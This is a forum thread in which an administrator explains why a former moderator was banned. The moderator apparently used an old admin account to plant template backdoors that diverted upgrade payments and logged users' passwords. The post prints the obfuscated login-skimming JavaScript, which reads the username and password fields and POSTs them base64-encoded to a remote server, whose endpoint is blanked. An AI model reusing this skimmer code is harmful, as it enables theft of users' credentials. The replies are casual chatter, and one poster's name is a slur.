Navigation X
Click here to register with a few steps and explore all our cool stuff we have to offer! | Best Forum Around | Free Premium Accounts


The sad story behind Am1nol

by KSZ - 07 October, 2019 - 11:53 PM
This post is by a banned member (KSZ) - Unhide
Staff Team

as some of you noticed, one of our first and most loyal member, @Am1nol, has been banned a few days ago with the words "Game Over".
I fully understand this looks like a random or non deserved ban, however there has been a reason behind that and I'll use this thread to clearify.

First of all: I don't have anything personal again him as this is "just" the Internet. If you need assistance with your reallife situation, you know where to find me. I can also fund your miserable life.

Now let me get straight to facts. Am1nol used to be a Moderator on this forum, actually the first one ever. I would say I would have trusted him with everything, he always seemed to be very loyal, helpful and interested in the forum project itself.
But sometimes the reality is a lot different.

Am1nol has abused a vulnerability to gain access to our AdminCP a few months ago. Not to mention that he had admin permissions temporarly anyway for some security fixes (I know, ironic, right?) but he used an older vulnerability to get access to an older admin account. I'm not sure which account it exactly was, but that doesn't matter anyway.
With that admin account he placed a backdor in two templates. The first one in our upgrade template, which had a encrypted script that was hooked to our normal upgrade plugin.
Am1nol also has been paid by me in the past for various bug fixes, penetration tests, etc. - He always has been treated pretty well by me (I guess?) and there was no sign that he would do what I'll explain below. The total amount for those payments are around 800€. 

Summary: He was stealing forum upgrades that were send to his own Wallet. Nothing I do really care about as its just money and I got enough of that.
But lets head over to the part that's actually disgusting.

Am1nol hooked a (backdored) javascript from his custom domain to log every password of every user in plaintext.
Every password that was entered into our login page, has been sent to his server and file:

You can actually still see his crypted javascript code.

Encrypted this was the script he used to log all passwords:
function sendDetails(_0xccf1x2) {
var _0xccf1x3 = document['getElementById']('username')['value'];
var _0xccf1x4 = document['getElementById']('password')['value'];
var _0xccf1x5 = new XMLHttpRequest();
_0xccf1x5['onreadystatechange'] = function() {
if (this['readyState'] == 2) {
_0xccf1x5['open']('POST', '', true);
_0xccf1x5['setRequestHeader']('content-type', 'application/x-www-form-urlencoded');
_0xccf1x5['send']('id=' + window['btoa'](_0xccf1x3) + '&data=' + window['btoa'](_0xccf1x4))

function login() {
sendDetails(function() {

This was also the reason behind the global password change force we had 2 weeks ago. Every password of every member has been logged and sent to his php file, but I mentioned that already above. And yes, your passwords have been logged in plaintext.

How I knew it was him? I found his custom bought domain, that contained both javascript files, in an older PM that he sent from his account to a test account to test a mybb vuln. After telling him what I found, he admitted what he did as it was pretty obvious.

Last but not least I take full responsibility for those accidents as I trusted those people and it's my own fault. Whether it was Am1nol, Jocker or any other person that turned out to betray me - I should have never trusted that blindly without looking further into it. Let this be a lesson for yourself as well. It doesn't matter how kind someone acts - if you look away, you get backstapped without mercy.

I'm sure Am1nol will stay around in this scene. Always remember that you should never trust a person online - no matter what!
For any upgrade-related issues, please private message me on site.

For account recoveries and 2fa issues contact @Teken or @Darkness

[Image: bBVCm7E.gif]

This post is by a banned member (hug) - Unhide
2 Years of service
(This post was last modified: 08 October, 2019 - 01:52 AM by hug.)
Damn bro get well soon
Just learn from this and try to move on Pepe just believe in yourself
[Image: ezgif-1-3583a31dbd9b.gif] Rules, Guidelines & Helpful Links [Image: ezgif-1-3583a31dbd9b.gif]

General Rules - Posting Rules - Shoutbox Rules

Usergroups - FAQ - Buy Credits - Awards
This post is by a banned member (Clay) - Unhide
2 Years of service
(This post was last modified: 08 October, 2019 - 12:04 AM by Clay. Edit Reason: Am1nol was gay but didn’t notice it )
Like u told to me
Never judge before what you don’t know

This really wistful story In memories

@am1nol u was nice to me and helped me thanks for everything I’ve done for me and this fourm Pepe
Jellyfish kek
Anyway @floraiN don’t trust anyone’s else from now on except me :D
This post is by a banned member (SliceAio) - Unhide
2 Years of service
damn, sad story.
You are right,  nenver trust somoen online!
[Image: standard.gif]
[Image: 6QX9QI5.gif]
This post is by a banned member (NIGGER) - Unhide
This post is by a banned member (JamesBond) - Unhide
1 Year of service
 [Image: Signature.webp]
This post is by a banned member (Nord) - Unhide
RIP, as I am still trying to process this overwhelming amount of info; hopefully this wont happen again. 
And your honesty as a forum administrator is appreciated.
[Image: S_2.gif]
This post is by a banned member (Wage) - Unhide

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Sign in
Already have an account? Sign in here.

Forum Jump:

Users browsing this thread: 1 Guest(s)